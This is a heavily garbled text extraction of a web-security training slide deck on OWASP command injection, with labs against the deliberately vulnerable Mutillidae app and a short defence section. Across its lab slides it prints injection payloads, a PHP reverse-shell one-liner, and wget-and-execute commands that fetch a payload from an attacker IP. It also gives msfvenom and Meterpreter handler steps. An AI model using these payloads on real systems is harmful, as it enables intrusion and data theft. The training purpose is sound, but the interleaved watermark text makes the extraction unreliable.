Web Application Security ll A -
R
ts h g i
OWASP A1 -‐ Command oIrnjection f d D T SC
re P -
re a p
Jeremy Druin LC L IS Cer,fied Lead Informa,on dSE ecurity Analyst n aWAPT-‐GOLD, GXPN, GPEN, GWAPT, G GMOB, GSEC, Sec+ n ui r D y m e r Je t gh i r opy C ) c ( © Copyright Jeremy Druin -‐ All Rights Reserved
R
ed v r e es
C
ui r D
yecurity Web Applica,on S m e er J t h OWASP A1-‐Injec,on g yri op C (c)
INTRODUCTION TO INJECTION
R
R
© Copyright Jeremy Druin -‐ All Rights Reserved
nd a n
L L EIS
re P -
re a p
or f d
D T SC
ll A -
ts h g i
ed v r e es
2
Injec&on •
•
ll A -
R
ts h g i
R
ed v r e es
D T Injec,on may be possible when input (data) is incorporated SC with code/ r fo script fragments passed to an interpreter d re a p • Any dynamically generated code/script passed tPo reinterpreters at run,me may be vulnerable LC L ISXpath, NoSQL • SQL, CGI, XML, JavaScript, SMTP, LDAP, E nd a in u r An interpreter cannot dis,nguish the code from the data incorporated at D y m e run,me r Je t gh i r py o C ) c (
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1-‐Injection
3
Injec&on
ll A -
R
ts h g i
R
D T C • While the developer intends input to be treated as data, Sinterpreters use r fo context to decide what to execute d re a p e r • Example P LC L IS E Code: ping <user-‐supplied-‐input> nd a in u r Input Data: www.google.com D y em www.google.com Developer sees: Jepring t h g Interpreter yrsi ees: ping www.google.com p o C (c)
• Developer "knows" code is blue / data is red
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1-‐Injection
4
Injec&on • •
ll A -
R
ts h g i
R
D T C While the developer intends input to be treated as data, Sinterpreters use r fo context to decide what to execute d re a p e r Example P LC L IS E Code: ping <user-‐supplied-‐input> nd a in u r Input Data : www.google.com; cat /etc/passwd D y em www.google.com; cat /etc/passwd Developer sees: Jepring t h g Interpreter yrsi ees: ping www.google.com; cat /etc/passwd p o C (c)
• Interpreter "knows" ping and cat are commands
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1-‐Injection
5
ts h g i
R
ed v r e es
Injec&on ll R A D CT S r assumes this will ond f • The develop intends for data to enter the applica,on a d e r always be the case pa e r P • An interpreter cannot dis,nguish the code i ntended by the developer from C L L the data incorporated at run,me EIS nd a • Both code and data are ASCII text uin r y Dcontext to decide and “first match wins” • Interpreters a`empt to umse re e • From the interpreters t J point of view the developers inten,ons are ambiguous h rig y op C c) (
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1-‐Injection
6
C
R
ui r D
yecurity Web Applica,on S m e er J t h OWASP A1-‐Injec,on g yri op C (c)
INTRODUCTION TO COMMAND INJECTION
R
© Copyright Jeremy Druin -‐ All Rights Reserved
nd a n
L L EIS
re P -
re a p
or f d
D T SC
ll A -
ts h g i
ed v r e es
7
Command Injec&on ll A -
R
ts h g i
R
ed v r e es
D T SC that passes • Injec,ng snippets of shell script/CGI script into an applica,on r fo d the opera,ng system commands to the host re a p e r P supplied input into the • May occur when applica,on incorporates user C LL host opera,ng system command passed to Sthe EI d • A`ack takes advantage of the trust nthe host (opera,ng system) has in the a applica,on uin r D y • The trust boundary violated m is between the web applica,on and the opera,ng e r Je system t gh i r • The a`ack eoxecutes on the host opera,ng system under the applica&ons py C ) account c (
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
8
C
ui r D
yecurity Web Applica,on S m e er J t h OWASP A1-‐Injec,on g yri op C (c)
COMMAND INJECTION BY EXAMPLE
R
R
© Copyright Jeremy Druin -‐ All Rights Reserved
nd a n
L L EIS
re P -
re a p
or f d
D T SC
ll A -
ts h g i
ed v r e es
9
Command Injec&on ll R A D CT • The DNS Lookup page in Mu,llidae II passes the IP address/host name S r submi`ed by the user to the nslookup command red fo
ts h g i
a
p e r -P
h>p://mu&llidae/index.php?page=dns-‐lookup.php LC
nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
L S I E
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
10
Command Injec&on • Note: Mu,llidae contains tutorials that may be helpful
nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
L L EIS
C
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
11
Command Injec&on Vulnerable server-‐ side source code
Field target_host
nd a n
L L EIS
C
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
ui r D $lTargetHost = $_REQUEST["target_host"]; y m e r echo '<pre style="text-align:left;">' Je t gh .shell_exec("nslookup " . $lTargetHost) i r y op .''; C (c)
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
12
Command Injec&on • When user submits a value, the server incorporates the value into an opera,ng system command re $lTargetHost = P $_REQUEST["target_host"]; C L echo '<pre IS L E style="text-align:left;">' d n .shell_exec("nslookup " in .a $lTargetHost) ru D y .''; em r
e tJ
gh i <pre> r py o nslookup C www.google.com ) c (
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
13
Command Injec&on • The O/S will execute the ini,al command then injected commands <pre>
nd a nslookup www.google.com; uinls r D y m e r Je t gh i r py o C ) c (
L L EIS
C
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
14
Command Injec&on • Commands can be chained <pre> nslookup www.google.com; LC L IS cd /; ls E nd a uin r D y m e r Je t gh i r py o C ) c (
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
15
Command Injec&on • Commands can be run to explore system, escalate privilege and open resources re P -
$lTargetHost = $_REQUEST["target_host"]; LC L echo '<pre IS style="text-align:left;">' nd E a .shell_exec("nslookup u"in . r D $lTargetHost) y m e .''; er
t h g yri
J
<pre> op C ) ww.google.com && cat /etc/passwd nslookup (cw
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
16
Command Injec&on
re Command a p Injec,on Pre nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
L S I E
C L
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
17
C
ui r D
yecurity Web Applica,on S m e er J t h OWASP A1-‐Injec,on g yri op C (c)
LOCATING COMMAND INJECTION
R
R
© Copyright Jeremy Druin -‐ All Rights Reserved
nd a n
L L EIS
re P -
re a p
or f d
D T SC
ll A -
ts h g i
ed v r e es
18
Loca&ng Command Injec&on • Look for pages that appear to execute system commands • ping, nslookup, traceroute, nd etc. a uin r D y • CGI scripts m e r Je t gh i r py o C ) c (
L L EIS
C
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
19
Loca&ng Command Injec&on • A>empt to iden&fy the opera&ng system • HTTP Response vanity headers C • x-‐powered-‐by, Server, x-‐aspnet-‐version, etc. LL
IS E • May be able to infer opera&ng system nd a from clues uin r D y m exclusively e • ASP.NET runs on Windows r Je t h • IIS version is yr,ig ed directly to opera,ng op system C version (c)
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
20
Loca&ng Command Injec&on • A>empt to iden&fy the opera&ng system
re a p • May be able to infer opera&ng system from clues e r P • ASP.NET runs on Windows exclusively LLC IS E • IIS version is ,ed directly to opera,ng nd system version a in u r • A>empt to cause any error Don any page y m e r • Error message may Jereveal opera,ng system t gh i r py o C ) c (
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
File paths imply Linux opera&ng system
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
21
Loca&ng Command Injec&on • A>empt to fuzz input fields to cause error message for d e r a
D T SC
ll A -
R
ts h g i
• Characters reserved in opera,ng system shell rep P • /bin/bash: ! # $ % & ' ( ) * + , -‐ . / : ;L | ' ` , ;n =d ( ) ! ” [ ] . * ? a n i u • Non-‐alphanumeric ASCII cyharacters Dr m e r • Command injec,on Jvealues from Fuzz DB t gh i r py • Note shell func,ons may not display standard error o C (c) • When assessing “blind” pages errors may be inferred by missing output
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
22
Loca&ng Command Injec&on • Blind Command Injec&on
D T SC
ll A -
R
ts h g i
R
ed v r e es
or f d e r • Some vulnerable pages may not produce explicit output pa e r P • Two methods may help detect command injec,on vulnerabili,es in these cases C L L S I E • Missing output d an n • Time-‐delay inference ui r D y m e r Je t gh i r py o C ) c (
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
23
Web Application Security OWASP A1: Command Injection Loca&ng Command Injec&on D
ll A -
R
ts h g i
R
ed v r e es
or f dinjec,on may interupt • In some cases an error caused by fuzzing for command e r pa e the normal flow of execu,on r P • The site may suppress error messages resul,ng LC in neither normal output nor error L IS output E nd a • The site may only display informa,on from standard output (stdout) but not from the uin r standard error file handle (D stderr) y m e r e ay halt execu,on of the shell command before the command • The injected value Jm t h can generate ro gutput i py o C • Use differen,al analysys to detect differences between a baseline response and ) c ( other responses
© Copyright Jeremy Druin -‐ All Rights Reserved
• When fuzzing for command injec&on note when pages aSre CTmissing output
24
Loca&ng Command Injec&on ll A -
R
ts h g i
D T • By causing the response &me of the increase measurably SCit may be r fo d possible to detect command injec&on without visible re output a p e r P ,me of a normal response • Use ,me-‐delay inference comparing the average C against an a`acker chosen ,me delay S LL EI d n • If the site is delayed as expected caommand injec,on has likely taken place n i ru D y • Example m e er J takes two second to load and an a`acker injec,ons a • If a page typically t h g yrtiakes 15 seconds to execute, a response ,me of 17 seconds p command that o C implies (ac )vulnerability
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
25
Loca&ng Command Injec&on ll A -
R
ts h g i
R
D T • Time-‐delay inference should be a>empted with commands SC most users r fo d are allowed to execute that cause a predictable delay re a p e r P increments and being • ping may work well due to running in one second LaCgainst the loopback interface L executable by users on Windows and Linux IS E • Windows: ping -‐n 15 127.0.0.1 n and ui r D • Linux: ping -‐i 15 -‐c 2m 1y27.0.0.1 re e tJ • Try prefixing and gshuffixing the injec,on with chaining characters discussed in i r upcoming slides py o C ) c • ||, |(, &&, &, `, ,
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
26
C
ui r D
yecurity Web Applica,on S m e er J t h OWASP A1-‐Injec,on g yri op C (c)
TESTING COMMAND INJECTION
R
R
© Copyright Jeremy Druin -‐ All Rights Reserved
nd a n
L L EIS
re P -
re a p
or f d
D T SC
ll A -
ts h g i
ed v r e es
27
Web Application Security OWASP A1: Command Injection Tes&ng Command Injec&on D T SC
ll A -
R
ts h g i
R
ed v r e es
d e r • The source code prior to the injec,on point cannot pbae controlled e r P C • The injec,on must work with the exis,ng LcLommand Injec&on occurs S I E requires chaining here so a>acker • Successful command injec,on typically d n a influence begins at n i u r this point D y m e $lTargetHost = $_REQUEST["target_host"]; r Je t echo '<pre style="text-align:left;">' gh i r py o .shell_exec("nslookup " . $lTargetHost) C ) (c .'';
© Copyright Jeremy Druin -‐ All Rights Reserved
• Once vulnerability located (or at least suspected) test focrommands
28
Tes&ng Command Injec&on ll A -
R
ts h g i
R
ed v r e es
D T • Command chaining allows one command to be executed once the previous SC r o f d completes e ar p re P C L L IS Windows E nd a uin r D y command1command2 m Runs the first command then the second command e r Je t command1 & command2 Runs the first command then the second command gh i r y pommand2 o command1 && c Run second command only if first command successful C ) (c
command1 || command2
Run second command only if first command fails
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
29
Tes&ng Command Injec&on
ts h g i
R
ed v r e es
ll R A D T previous completes • Command chaining allows one command to be executed once tChe S or f d e r pa e r P Linux LC L IS E ntdhe first command then the second command command1command2 Runs a uin r command1; command2 D Runs the first command then the second command y m command1 & command2 Jere Runs the first command then the second command t gh i r command1 && command2 Run second command only if first command successful y p o C command1 |(c| )command2 Run second command only if first command fails
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
30
Tes&ng Command Injec&on ll A -
R
ts h g i
D T • Start by injec&ng basic commands that are most likely rto SCwork at any fo d privilege level re a p e r P • Linux LC L • ls list directory contents IS E nd a • pwd print current directory path uin r D y • Windows m e r Je t • dir list driirectory contents gh py o • cd ) C print current directory path (c
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
31
Tes&ng Command Injec&on • Start by injec&ng basic commands that are most likely to work at any privilege level • Directory lis,ng usually possible LC L IS E • Prin,ng the current directory; nd a PWD (Linux), CD (Windows) also uin r D generally ubiquitous y m e r Je t gh i r py o C ) c (
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
32
Tes&ng Command Injec&on D T • A>empt to chain commands based on opera&ng system SC r fo d re a p e r P LC L IS E nd a uin r D y m e r Je t gh i r py o C ) c (
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
33
C
ui r D
yecurity Web Applica,on S m e er J t h OWASP A1-‐Injec,on g yri op C (c)
USING COMMAND INJECTION
R
R
© Copyright Jeremy Druin -‐ All Rights Reserved
nd a n
L L EIS
re P -
re a p
or f d
D T SC
ll A -
ts h g i
ed v r e es
34
Command Injec&on ll A -
R
ts h g i
D T • Once command injec&on established work towards control SC of system r fo d re • Determine account and privilege level of current user a p e r P • Determine current loca,on within file system LC L EIS • Catalog, locate and pilfer available fidles an n uiand try to establish shell r • Test for outbound connec,vity D y m e r • A`empt to persist aJccess e t gh i r • Pivot into internal py network o C ) c (
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
35
Command Injec&on Example • Determine account and privilege level of current or f d e user r pa e r -P www.google.com;whoami;pwd;ls nd a n
whoami
(c)
L L EIS
ui r D account print current uyser m e r Je t gh i r py o C
C
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
36
Command Injec&on Example • Determine current loca&on within file system or f d e r a rep www.google.com;whoami;pwd;ls
pwd ls
L L EIS
P C
nd a print current directory uin r list contents m of ycDurrent directory re e tJ h rig y op C (c)
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
37
Command Injec&on Example • Catalog, locate and pilfer available files www.google.com; cat /etc/passwd
nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
L L EIS
C
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
38
C
ui r D
yecurity Web Applica,on S m e er J t h OWASP A1-‐Injec,on g yri op C (c)
COMMAND INJECTION DEFENSE
R
R
© Copyright Jeremy Druin -‐ All Rights Reserved
nd a n
L L EIS
re P -
re a p
or f d
D T SC
ll A -
ts h g i
ed v r e es
39
Command Injec&on Defense • Default Deny • Least Privilege • Data Execu&on Preven&on nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
L L EIS
C
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
40
Command Injec&on Defense
D T SC
• Default Deny
ll A -
R
ts h g i
R
ed v r e es
or f Someone please explain why this d e • By default the web applica,on account must not ar apache server account is allowed p e r be allowed to run any shell commands to ping. Do web servers need to P check to see if their cousin IIS is LC L online? EIS nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
41
Command Injec&on Defense • Default Deny
re a p
or f d
D T SC
ll A -
R
ts h g i
re P • If opera,ng system func,onality is necessary a-`empt to call a standard C L L framework func,on that will supply the ISsame result E nd to resolve a hostname use standard • For example if a PHP applica,on n eeds a in u r func,on gethostbyaddr() rather D than execu,ng nslookup via shell_exec() y m e r Je t gh i r py o C ) c (
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
42
Command Injec&on Defense • Least Privilege
D T SC
ll A -
R
ts h g i
or f d execute specific, e • The least-‐privilege principle states applica,ons must o nly r pa e r preapproved commands P LC execu,ng under the web • Default deny will prevent any commands Lfrom IS E applica,on account nd a • Least-‐privilege effec,vely is arn uienxcep,on to default deny for the necessary commands (executable) my D re e tJ h rig y op C (c)
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
43
Command Injec&on Defense • Data Execu&on Preven&on
D T SC
ll A -
R
ts h g i
R
ed v r e es
or f • All non-‐alpha-‐numeric parameter values passed to tahe redshell script must be p e r escaped P LC of "nn", where "nn" is a string of • Bash: \0xx translates to the octal ASCII equivalent L IS digit E nd a uin r D y • Input could be shell-‐script o r data, but the interpreter (i.e. Bash) "knows" m e r data ere escaped characters a J t h g ri when the input forms syntac,cally correct shell-‐script • This is true peyven o C (c)
© Copyright Jeremy Druin -‐ All Rights Reserved
Web Application Security OWASP A1: Command Injection
44
ru Web Applica,on Security D y m e OWASP A1-‐Injec,on r Je
C
R
R
© Copyright Jeremy Druin -‐ All Rights Reserved
i
nd a n
L L EIS
re P -
re a p
or f d
D T SC
ll A -
ts h g i
ed v r e es
t
gh Command Injec,on i r py o C ) c (
LAB
45
Command Injec&on • Extract /etc/password
nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
L L EIS
C
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
46
ts Command Injec&on to extract / h g i R l etc/password Al D T SC r fo • The DNS lookup page in d re a p e Mu&llidae II contains a r P command injec&on vulnerability LC L IS E • Ubuntu nd a • h`p://localhost/mu,llidae/ ruin D y index.php?page=dns-‐lookup.php m e r Je • Samurai WTF t gh i r py • h`p://mu,llidae/index.php? o C ) c page=dns-‐lookup.php (
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
47
ts Command Injec&on to extract /etc/ h g i R l password Al D T SC r fo • Locate the command injec,on d re a p e vulnerability using command separators r P and universal binaries LC
• • • •
& ls | ls ; ls Others op C (c)
nd a n
t h g yri
J
m e r e
y
ui r D
L S I E
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
48
Command Injec&on to extract /etc/ password • Determine the current directory • & pwd nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
L L EIS
C
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
49
ts Command Injec&on to extract /etc/ h g i R l password Al D T SC r fo • Use directory traversal to move out of d re a p e the web root directory and access / r P C etc/passwd LL
• & cat /etc/passwd
op C (c)
t h g yri
J
m e r e
y
uin r D
IS E d an
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
50
ru Web Applica,on Security D y m e OWASP A1-‐Injec,on r Je
C
R
R
© Copyright Jeremy Druin -‐ All Rights Reserved
i
nd a n
L L EIS
re P -
re a p
or f d
D T SC
ll A -
ts h g i
ed v r e es
t
gh Command Injec,on i r py o C ) c (
LAB
51
Command Injec&on • Reverse bash shell
D T SC
or f d • Reference: demo-‐command-‐injec,on-‐reverse-‐shell-‐via-‐php.txt e r pa e r P LC L IS E nd a uin r D y m e r Je t gh i r py o C ) c (
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
52
ts Command injec&on to gain h g i R l reverse bash shell Al D T SC r fo • The DNS lookup page in d re a p e Mu&llidae II contains a r P command injec&on vulnerability LC L IS E • Ubuntu nd a • h`p://localhost/mu,llidae/ ruin D y index.php?page=dns-‐lookup.php m e r Je • Samurai WTF t gh i r py • h`p://mu,llidae/index.php? o C ) c page=dns-‐lookup.php (
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
53
ts Command injec&on to gain reverse bash h g i R l shell Al D T SC r fo • Locate the command injec&on d re a p e vulnerability using command r P C separators and universal binaries LL
• • • •
& ls | ls ; ls Others
op C (c)
t h g yri
J
m e r e
y
uin r D
IS E d an
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
54
Command injec&on to gain reverse bash shell
ll A -
R
ts h g i
R
ed v r e es
D T SC • Send commands tes&ng outbound connec&vity from voulnerable server r f d e back to a>acker controlled host r pa e r • Set up listener on a`acker controlled host - P C L L • A`empt to have web applica,on server ISreach out to a`acker host over various E protocols and ports nd a n • ICMP à ping -‐c 1 10.0.0.164 rui D y • UDP à tracepath -‐c re 1 m 10.0.0.164 e tJ • TCP à telnet 1 0.0.0.164 1234 h g i r ppyrotocols likely to be allowed o • Test ports a) nd C c ( • DNS, web, proxy, etc.
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
55
R
ts Command injec&on to gain reverse bash shell h g i R l Al D T • Set up tcpdump on local host filtering for incoming packets SC des&ned for r fo d a>acker IP re a
• tcpdump -‐i eth0 -‐vv -‐X dst
nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
L L EIS
C
p e r -P
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
56
Command injec&on to gain reverse bash shell • A`empt to have web applica,on send packet
D T SC
ll A -
R
ts h g i
R
ed v r e es
or f d • www.google.com; tracepath -‐c 1 10.224.35.168 (UDP) e r pa e r • www.google.com & telnet 10.224.35.168 1234 P(TCP) LC L IS E nd a A>acking host receives packet uin r D confirming connec&vity y m re e tJ h rig y op C (c)
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
57
R
ed v r e es
ts Command injec&on to gain reverse bash shell h g i R l Al D T C server connect • If outbound connec&vity established a>empt to have w eb S r fo d back to a>acker host re
• Set up listener on a`acker host nc -‐l -‐p 1234
nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
a
L L EIS
C
p e r -P
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
58
R
ed v r e es
ts Command injec&on to gain reverse bash shell h g i R l Al D T C server connect back to • If outbound connec&vity established a>empt to have w eb S r fo d a>acker host re
pa e r • Once listener set-‐up, ask web applica,on server Pto connect back to a`acker host LC • Set IP address appropriately L IS E nd www.google.com;php -‐r '$sock=fsockopen(”",<port>);exec("/bin/sh -‐i &3 2>&3");' a n i ru D y m e er J t h g yri p o C (c)
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
59
Command injec&on to gain reverse bash shell • Once web applica&on server establishes connec&on, a shell should be opened
nd a • Note a shell is not a terminal uin r D • The shell runs with the emy er J privileges of the web t h g applica,on account yri p o C (c)
D T SC
ll A -
R
Type or commands f d into shell e r a
L L EIS
C
p e r -P
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
60
ru Web Applica,on Security D y m e OWASP A1-‐Injec,on r Je
C
R
R
© Copyright Jeremy Druin -‐ All Rights Reserved
i
nd a n
L L EIS
re P -
re a p
or f d
D T SC
ll A -
ts h g i
ed v r e es
t
gh Command Injec,on i r py o C ) c (
LAB
61
Command Injec&on • Reverse Meterpreter
D T SC
ll A -
R
ts h g i
or f d • Reference: demo-‐command-‐injec,on-‐via-‐meterpreter-‐php-‐shell-‐upload.txt e r pa e r P LC L IS E nd a uin r D y m e r Je t gh i r py o C ) c (
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
62
ts Command injec&on to gain h g i R l reverse Meterpreter shell Al D T SC r fo • The DNS lookup page in d re a p e Mu&llidae II contains a r P command injec&on vulnerability LC L IS E • Ubuntu nd a • h`p://localhost/mu,llidae/ ruin D y index.php?page=dns-‐lookup.php m e r Je • Samurai WTF t gh i r py • h`p://mu,llidae/index.php? o C ) c page=dns-‐lookup.php (
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
63
Command injec&on to gain reverse Meterpreter shell • Locate the command injec&on vulnerability using command separators and universal binaries • • • •
& ls | ls ; ls Others op C (c)
nd a n
t h g yri
J
m e r e
y
ui r D
L L EIS
C
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
64
Command injec&on to gain reverse Meterpreter shell
ll A -
R
ts h g i
R
ed v r e es
D T SC • Send commands tes&ng outbound connec&vity from voulnerable server r f d e back to a>acker controlled host r pa e r • Set up listener on a`acker controlled host - P C L L • A`empt to have web applica,on server ISreach out to a`acker host over various E protocols and ports nd a n • ICMP à ping -‐c 1 10.0.0.164 rui D y • UDP à tracepath -‐c re 1 m 10.0.0.164 e tJ • TCP à telnet 1 0.0.0.164 1234 h g i r ppyrotocols likely to be allowed o • Test ports a) nd C c ( • DNS, web, proxy, etc.
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
65
R
ts Command injec&on to gain reverse Meterpreter shell h g i R l Al D T • Set up tcpdump on local host filtering for incoming packets SC des&ned for r fo d a>acker IP re a
• tcpdump -‐i eth0 -‐vv -‐X dst
nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
L L EIS
C
p e r -P
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
66
Command injec&on to gain reverse Meterpreter shell • A`empt to have web applica,on send packet
D T SC
ll A -
R
ts h g i
R
ed v r e es
or f d • www.google.com; tracepath -‐c 1 10.224.35.168 (UDP) e r pa e r • www.google.com & telnet 10.224.35.168 1234 P(TCP) LC L IS E nd a A>acking host receives packet uin r D confirming connec&vity y m re e tJ h rig y op C (c)
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
67
R
ed v r e es
ts Command injec&on to gain reverse Meterpreter shell h g i R l Al D T • Assuming vulnerable web server can connect back to ar>acker host, it may SC fo be possible to force web server to download payload d re
a • A web server can be set up on a`acker host Prep C • A command injec,on can cause web server L can download and execute content L IS E nd a wget h>p://acker IP>/php-‐meter-‐script.txt -‐O /tmp/php-‐meter-‐script.php uin r D y php -‐f /tmp/php-‐meter-‐script.php m e er J t h Download and g i r py save file from o Execute fi le w ith C a>acker host (c) PHP interpreter
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
68
ts Command injec&on to gain reverse Meterpreter shell h g i R l Al D T • Search available payloads for those that offer PHP Meterpreter SC r fo d re a p e r msfvenom -‐-‐list payloads | grep php/meter - P nd a n
op C (c)
t h g yri
J
m e r e
y
ui r D
L L EIS
C
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
69
R
ed v r e es
ts Command injec&on to gain reverse Meterpreter shell h g i R l Al D T • Use msfvenom to generate Meterpreter PHP payload r SC fo d re a p e r Pphp/meterpreter/ msfvenom -‐-‐arch php -‐-‐plalorm PHP -‐-‐payload C LP> reverse_tcp -‐-‐format raw lhost=acker I lport=acker port> > /var/ L S I E www/html/commented-‐php-‐meter-‐script.txt d n n rui
D y m
t
(c)
py o C
h rig
re e J
a
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
70
R
ts Command injec&on to gain reverse Meterpreter shell h g i R l Al D T C • msfvenom puts a comment symbol at the front of the M PHP Seterpreter r fo payload d re a
• Remove the comment symbol
L L EIS
C
p e r -P
sed 's/\/\*//' /var/www/html/commented-‐php-‐meter-‐script.txt > /var/ nd a n www/html/php-‐meter-‐script.txt rui D y m
t
(c)
py o C
h rig
re e J
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
71
Command injec&on to gain reverse Meterpreter shell • Start Apache web server running on a>acking host
D T SC
ll A -
R
ts h g i
R
ed v r e es
or f d the vulnerable web • The web server will serve the Meterpreter PHP shell w hen e r pa e server requests the file r P LC L IS E nd a uin r D y m e r Je t gh i r py o C ) c (
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
72
Command injec&on to gain reverse Meterpreter shell • Start a listener on the a>acking host for Meterpreter to connect
LC msfconsole L IS E msf > use mul&/handler nd a uipnhp/ msf exploit(handler) > set payload r D meterpreter/reverse_tcp emy er J msf exploit(handler) g>h st et lhost acker IP> ri y p msf exploit(handler) > set lport acker port> o C (c) msf exploit(handler) > exploit
re P -
re a p
or f d
D T SC
ll A -
R
ts h g i
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
73
ts Command injec&on to gain reverse h g i R l Meterpreter shell Al D T SC r fo • Inject command to cause web server to pull d re a p e file from a>acking host and execute r P Meterpreter script LC nd a n
L S I E
& ;wget h>p://10.224.35.168/php-‐meter-‐ ui r D y script.txt -‐O /tmp/php-‐meter-‐script.php;php -‐ m e r Je f /tmp/php-‐meter-‐script.php t h
R
ed v r e es
© Copyright Jeremy Druin -‐ All Rights Reserved
Lab
g
(c)
yri p Co
74
R
ed v r e es
